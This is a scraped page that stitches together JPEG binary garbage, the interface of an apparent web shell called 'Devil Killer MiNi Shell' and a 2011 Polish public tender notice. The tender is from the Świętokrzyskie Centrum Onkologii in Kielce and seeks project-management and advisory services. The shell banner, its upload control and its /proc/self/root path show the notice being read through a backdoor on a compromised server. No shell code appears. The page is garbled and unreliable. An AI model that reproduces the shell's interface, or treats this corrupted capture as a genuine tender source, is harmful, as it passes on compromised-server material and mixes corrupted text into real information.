JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20110421/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20110421/122191-N-2011.html

<p class="kh_header"><b>Kielce: Wsparcie procesu zarządzania projektem, doradztwo techniczne i prawne oraz dotyczące promocji projektu. nr sprawy AZP 241-27/11</b><br>
<b>Numer ogłoszenia: 122191 - 2011; data zamieszczenia: 21.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Świętokrzyskie Centrum Onkologii , ul. Artwińskiego 3, 25-734 Kielce, woj. świętokrzyskie, tel. (041) 3674280, faks (041) 36 74 071.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.onkol.kielce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wsparcie procesu zarządzania projektem, doradztwo techniczne i prawne oraz dotyczące promocji projektu. nr sprawy AZP 241-27/11.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W ramach realizacji przedmiotu zamówienia Wykonawca będzie wykonywał usługi obejmujące:
1) Wsparcie zarządzania projektem.
2) Usługi eksperckie.
3) Doradztwo techniczne.
4) Doradztwo prawne.
5) Doradztwo w promocji projektu.
Szczegółowy zakres i opis przedmiotu zamówienia opisany został w załączniku nr 1 do siwz. Wykonawca musi zaoferować przedmiot zamówienia zgodny z wymogami Zamawiającego, określonymi w w/w załączniku do siwz. Koncepcja i produkty projektu zawiera Studium Wykonalności oraz wniosek o dofinansowanie projektu stanowiące załącznik nr 2 do siwz..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 72.22.40.00-1, 71.24.10.00-9, 72.22.00.00-3, 74.14.21.00-7, 79.11.10.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do postępowania jest zobowiązany wnieść wadium w wysokości 8.700,00 zł (słownie: osiem tysięcy siedemset złotych).
Wadium może być wniesione w jednej lub kilku z poniższych form:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym.
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielonych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r.Nr 42, poz. 275 z późn. zm.).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Na potwierdzenie należy złożyć oświadczenie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia powyższy warunek postępowania dotyczący posiadania wiedzy i doświadczenia o ile wykaże, że w okresie ostatnich trzech lat przed dniem upływu terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie należycie wykonał lub wykonuje w przypadku zamówień ciągłych lub okresowych:
a)przynajmniej dwa zamówienia, w ramach których zrealizował usługi doradcze w zakresie opracowania, przygotowania, organizacji lub zarządzania projektami teleinformatycznymi współfinansowanymi ze środków UE, w których beneficjentami były partnerstwa (konsorcja) przynajmniej pięciu Zakładów Opieki Zdrowotnej przy czym każda usługa:
- dotyczyła budowy i wdrożenia systemu informatycznego,
- dotyczyła projektu unijnego, gdzie łączna wartość nakładów inwestycyjnych była nie mniejsza niż 15 mln zł brutto,
b)przynajmniej trzy zamówienia, w ramach których realizował usługi doradcze w zakresie opracowania, przygotowania, organizacji i wsparcia zarządzania projektami teleinformatycznymi współfinansowanymi ze środków UE, z których każdy:
- dotyczył budowy i wdrożenia systemu informatycznego,
- miał wartość nie mniejszą niż 3 mln zł brutto,
- prowadzony był zgodnie z metodyką PRINCE2,
a wartość łączna usług doradczych dla wszystkich zamówień łącznie wynosiła nie mniej niż 500.000 zł brutto,
c)przynajmniej dwa zamówienia, w ramach których przeprowadził lub świadczył usługi doradcze w zakresie przeprowadzenia postępowań o udzielenie zamówienia publicznego zgodnie z ustawą Prawo zamówień publicznych dla projektów współfinansowanych ze środków UE z których każde obejmowało łącznie przynajmniej następujące zadania:
a.opracowanie lub weryfikację specyfikacji istotnych warunków zamówień i dokumentacji przetargowych,
b.wsparcie Zamawiającego w odpowiedzi na pytania wykonawców,
c.wsparcie Zamawiającego w przygotowaniu formalnych pism w ramach postępowania w tym w procedurach odwoławczych,
d.ocena wniosków lub ofert wykonawców,
e.wsparcie Zamawiającego w zawarciu umowy na wykonanie zamówienia,
dotyczących budowy i wdrożenia systemów informatycznych o wartości zamówienia min. 3 mln zł brutto każdy, przy czym wartość jednego z tych zamówień wynosiła min. 5 mln zł. brutto;
d)przynajmniej dwa zamówienia, w ramach których wykonawca zrealizował usługi doradcze polegające na analizie i formalnej specyfikacji wymagań dla zintegrowanego systemu informatycznego wdrażanego w jednostce służby zdrowia, przy czym wartość usług doradczych polegających na analizie i formalnej specyfikacji wymagań w każdym zamówieniu była nie mniejsza niż 200 000 zł brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Na potwierdzenie należy złożyć oświadczenie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia powyższy warunek postępowania dotyczący dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia o ile wykaże, że dysponuje następującymi osobami zdolnymi do wykonania zamówienia:
Kierownik projektu - min. 1 osoba, która:
- posiada wykształcenie wyższe,
- posiada certyfikat zarządzania projektami PRINCE2 na poziomie PRACTITIONER,
- posiada co najmniej 5 letnie udokumentowane doświadczenie w pełnieniu roli kierownika projektu, obejmujące udział w roli kierownika projektu w co najmniej:
- 2 projektach doradczych, obejmujących przygotowywanie, organizację i zarządzanie projektami teleinformatycznymi dotyczącymi budowy i wdrożenia systemów informatycznych, o wartości min. 10 mln zł brutto każdy, w których wartość prac doradczych wynosiła minimum 250.000 zł brutto każda i które były prowadzone zgodnie z metodyką PRINCE2.
Analityk - co najmniej 2 osoby, z których każda:
- posiada wykształcenie wyższe,
- posiada co najmniej 3 letnie udokumentowane doświadczenie w pełnieniu roli analityka obejmujące udział w roli analityka w co najmniej 2 projektach doradczych, obejmujących opracowywanie, przygotowywanie, organizację i zarządzanie projektami teleinformatycznymi dotyczącymi budowy i wdrożenia systemów informatycznych, o wartości min. 10 mln zł brutto każdy, w których wartość prac doradczych wynosiła minimum 50.000 zł brutto każda i które były prowadzone zgodnie z metodyką PRINCE2.
Architekt - co najmniej 1 osoba, która:
- posiada wykształcenie wyższe,
- posiada minimum 5 letnie doświadczenie w pełnieniu funkcji Architekta Projektu w zakresie projektów informatycznych i wdrażania systemów aplikacyjnych,
- brał udział w roli architekta projektu w minimum 2 projektach o wartości zamówienia na kwotę minimum 2 000 000 zł brutto,
- posiada potwierdzoną posiadaniem certyfikatu TOGAF znajomość frameworku The Open Grup Architecture Framework,
- posiada certyfikat techniczny dokumentujący znajomość przynajmniej jednego systemu operacyjnego na poziomie administracyjnym; wydany przez producenta oprogramowania systemu operacyjnego
- posiada certyfikat techniczny dokumentujący znajomość technologii sprzętowych modułów kryptograficznych (HSM); wydany przez producenta tych urządzeń;
- posiada następujące certyfikaty i uprawnienia zawodowe z zakresu bezpieczeństwa informacji i prowadzenia audytów:
 	- certyfikat CISSP: Certified Information System Security Professional (http://www.isc2.org),lubcertyfikat CISA: Certified Information System Auditor (http://www.isaca.org),
 	- certyfikat CEH: Certified Ethical Hacker (http://www.eccouncil.org/) lubcertyfikat GIAC Certified Penetration Tester (http://www.giac.org).,
 	- uprawnienia audytora systemu zarządzania bezpieczeństwem informacji według normy bezpieczeństwa ISO27001 lub ISO17799 lub BS7799,
 	- uprawnienia audytora systemu zarządzania ciągłością działania według normy BS25999, lub posiadanie certyfikatu Associate Business Continuity Professional (ABCP) przy jednoczesnym posiadaniu certyfikatu audytorskiego (np. CISA, audytor ISO 27001)
 	- uprawnienia audytora systemu zarządzania usługami IT według normy ISO20000 lub certyfikat ITIL Practitioner przy jednoczesnym posiadaniu certyfikatu audytorskiego (np. CISA, audytor ISO 27001)
 	- posiada poświadczenie bezpieczeństwa osobowego upoważniające do dostępu do informacji niejawnych oznaczonych klauzulą, co najmniej poufne,
 	- ukończył szkolenie dla administratorów systemów/inspektorów bezpieczeństwa informatycznego wymagane przepisami artykułu 64 ust. 3 ustawy o ochronie informacji niejawnych przeprowadzone przez Agencję Bezpieczeństwa Wewnętrznego;
Architekt bezpieczeństwa - min. 1 osoba, która:
- posiada wykształcenie wyższe,
- brał udział w roli architekta bezpieczeństwa w minimum 2 projektach o wartości zamówienia na kwotę minimum 2.000.000 zł brutto,
- posiada potwierdzoną posiadaniem certyfikatu TOGAF znajomość frameworku The Open Grup Architecture Framework,
- posiada certyfikat techniczny dokumentujący znajomość przynajmniej jednego systemu operacyjnego na poziomie administracyjnym; wydany przez producenta oprogramowania systemu operacyjnego,
- posiada certyfikat techniczny dokumentujący znajomość technologii sprzętowych modułów kryptograficznych (HSM); wydany przez producenta tych urządzeń;
- posiada następujące certyfikaty i uprawnienia zawodowe z zakresu bezpieczeństwa informacji i prowadzenia audytów bezpieczeństwa:
 	- certyfikat CISM: Certified Information Security Manager (http://www.isaca.org),
 	- certyfikat CISSP: Certified Information System Security Professional (http://www.isc2.org),lubcertyfikat CISA: Certified Information System Auditor (http://www.isaca.org),
 	- certyfikat CEH: Certified Ethical Hacker (http://www.eccouncil.org/) lubcertyfikat GIAC Certified Penetration Tester (http://www.giac.org).,
 	- uprawnienia audytora systemu zarządzania bezpieczeństwem informacji według normy bezpieczeństwa ISO27001 lub ISO17799 lub BS7799,
 	- uprawnienia audytora systemu zarządzania ciągłością działania według normy BS25999, lub certyfikatu Associate Business Continuity Professional (ABCP) przy jednoczesnym posiadaniu certyfikatu audytorskiego (np. CISA, audytor ISO 27001),
 	- uprawnienia audytora systemu zarządzania usługami IT według normy ISO20000 lub certyfikat ITIL Practitioner przy jednoczesnym posiadaniu certyfikatu audytorskiego (np. CISA, audytor ISO 27001).
 	- posiada poświadczenie bezpieczeństwa osobowego upoważniające do dostępu do informacji niejawnych oznaczonych klauzulą co najmniej poufne,
 	- ukończył szkolenie dla administratorów systemów/inspektorów bezpieczeństwa informatycznego wymagane przepisami artykułu 64 ust. 3 ustawy o ochronie informacji niejawnych przeprowadzone przez Agencję Bezpieczeństwa Wewnętrznego,
 	- posiada minimum 5 letnie doświadczenia w pełnieniu funkcji Architekta bezpieczeństwa w zakresie projektów informatycznych i wdrażania systemów aplikacyjnych.
Specjalista ds. zamówień publicznych
- posiada wykształcenie wyższe,
- posiada co najmniej 3 letnie udokumentowane doświadczenie w pełnieniu roli specjalisty ds. zamówień publicznych obejmujące udział w co najmniej 2 projektach doradczych obejmujących przeprowadzenie lub świadczenie usług doradczych w zakresie przeprowadzenia postępowań o udzielenie zamówienia publicznego zgodnie z ustawą Prawo zamówień publicznych dla projektów współfinansowanych ze środków UE o wartości projektu min. 10 mln zł brutto i wartości usług doradczych min. 50.000 zł brutto, które były prowadzone zgodnie z metodyką PRINCE2.
Każda z osób zdolnych do wykonania zamówienia może pełnić tylko jedną wyżej wymienioną rolę.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia powyższy warunek postępowania dotyczący sytuacji ekonomicznej i finansowej o ile wykaże, że:
- posiada środki finansowe lub zdolność kredytową w wysokości 200.000 zł,
- posiada polisę, a w przypadku jej braku inny dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej z tytułu prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na sumę minimum 1.000.000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wypełniony formularz oferty (sporządzony wg wzoru stanowiącego załącznik nr 3 do SIWZ);
2) Opis sposobu realizacji przedmiotu zamówienia zawierający:
- opis proponowanego przebiegu realizacji zamówienia,
- zdefiniowanie produktów, które powstaną w ramach zamówienia,
- opis współpracy z Zamawiającym.
3) w przypadku, gdy Wykonawcę reprezentuje pełnomocnik - pełnomocnictwo określające jego zakres i podpisane przez osoby uprawnione do reprezentacji Wykonawcy;
4) w przypadku, gdy ofertę składają wykonawcy ubiegający się wspólnie o udzielenie zamówienia - pełnomocnictwo określającego zakres umocowania pełnomocnika ustanowionego do reprezentowania ich w postępowaniu, stosownie do art. 23 ust. 2 ustawy. Pełnomocnictwo takie musi wskazywać pełnomocnika (w tym zakres jego umocowania), a także wszystkich wykonawców wspólnie ubiegających się o zamówienie.
5) kopia dokumentu potwierdzającego wniesienie wadium.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której została ona zawarta.
2. Umowa może zostać zmieniona w sytuacji gdy:
1) Zmiany przepisów podatkowych w zakresie zmiany stawki podatku VAT. W przypadku wprowadzenia zmiany stawki podatku VAT, zmianie ulegnie wysokość wynagrodzenie netto wchodzącego w skład łącznego wynagrodzenia brutto, stawka podatku VAT oraz wartość podatku VAT.
2) Wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy - w zakresie dostosowania postanowień umowy do zmiany przepisów prawa.
